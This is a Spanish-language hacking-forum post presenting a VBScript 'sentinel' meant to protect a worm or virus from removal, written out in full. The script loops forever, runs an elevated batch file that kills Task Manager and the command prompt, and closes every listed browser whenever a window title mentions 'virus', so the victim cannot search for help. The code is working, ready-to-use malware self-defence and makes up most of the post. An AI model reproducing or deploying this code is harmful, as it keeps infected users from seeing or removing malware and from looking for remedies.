Foro de elhacker.net

Programación => Scripting => Mensaje iniciado por: John1Connor en 16 Julio 2021, 15:25 pm


Título: Centinela VBScript - AutoDefensa para Virus y Gusanos [Malware Programming]
Publicado por: John1Connor en 16 Julio 2021, 15:25 pm
Buenas, hace mucho no pasaba por acá (ni por ningún foro).
Hoy les traigo un Centinela para implementar en script de vb y proteger tu malware para dificultar su eliminación.

Breve Reseña:
Citar
Cuando yo me inicie en el mundo de la programación lo hice para programar viruses, mas precisamente gusanos. Pero con el tiempo aprendí de verdad y deje las pavadas y empecé a programar software y trabajar, ahora programo videojuegos, frameworks, y motores/editores de juegos.
Hace un mes sufrí una lesión en la cervical que no me permite trabajar ni estar mucho tiempo sentado programando, por eso me puse a hacer boludeces en vbscript.
Y mientras preparaba un buen gusanito con alma de ransomware (pero inofensivo), se me ocurrió ponerle un CENTINELA.
Que seria un CENTINELA? : Un script, o una función dentro de un script que se encarga de vigilar y velar por la integridad del malware.
De que manera? :  Buscando programas abiertos que te permitan "apagar" el virus como  el Administrador de tareas, o la consola de comandos CMD y cerrándolos.
                            Buscando entre los navegadores web y dentro de las pestañas o ventanas la palabra "virus" y así impedir que busques temas relacionados con
                             antivirus, virus, marcas de antivirus, soluciones, etc.

Y aqui el codigo, sencillito y de pocas lineas, cortita y al pie...

Código
  1. DO
  2. SET FASO = CreateObject("Scripting.FileSystemObject")
  3. SET YPF = WScript.CreateObject("WScript.Shell")
  4. SET SHELL = CreateObject("Shell.Application")
  5. YPF.Run "cmd /c echo taskkill /f /im Taskmgr.exe > %tmp%/protector.bat", 0, true
  6. YPF.Run "cmd /c echo taskkill /f /im cmd.exe >> %tmp%/protector.bat", 0, true
  7. SHELL.ShellExecute FASO.GetSpecialFolder(2) & "/protector.bat", , , "runas", 0
  8. YPF.Run "cmd /c tasklist /fi ""imagename eq chrome.exe"" /fo list /v > %temp%/out.txt", 0, true
  9. YPF.Run "cmd /c tasklist /fi ""imagename eq firefox.exe"" /fo list /v >> %temp%/out.txt", 0, true
  10. YPF.Run "cmd /c tasklist /fi ""imagename eq opera.exe"" /fo list /v >> %temp%/out.txt", 0, true
  11. YPF.Run "cmd /c tasklist /fi ""imagename eq safari.exe"" /fo list /v >> %temp%/out.txt", 0, true
  12. YPF.Run "cmd /c tasklist /fi ""imagename eq iexplore.exe"" /fo list /v >> %temp%/out.txt", 0, true
  13. YPF.Run "cmd /c tasklist /fi ""imagename eq microsoftedge.exe"" /fo list /v >> %temp%/out.txt", 0, true
  14. WScript.Sleep 100
  15. SET ARCHIVO = FASO.OpenTextFile(FASO.GetSpecialFolder(2) & "/out.txt", 1)
  16. IF InStr(lCase(ARCHIVO.ReadAll), "virus") > 0 THEN
  17. 	YPF.Run "taskkill /f /im chrome.exe", 0, True
  18. 	YPF.Run "taskkill /f /im firefox.exe", 0, True
  19. 	YPF.Run "taskkill /f /im opera.exe", 0, True
  20. 	YPF.Run "taskkill /f /im safari.exe", 0, True
  21. 	YPF.Run "taskkill /f /im iexplore.exe", 0, True
  22. 	YPF.Run "taskkill /f /im microsoftedge.exe", 0, True
  23. END IF
  24. WScript.Sleep 100
  25. LOOP
  26.  
  27. REM        Centinela VBScript  - Powered by JohnConnor (L) 2021
  28.  


Saludos!


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines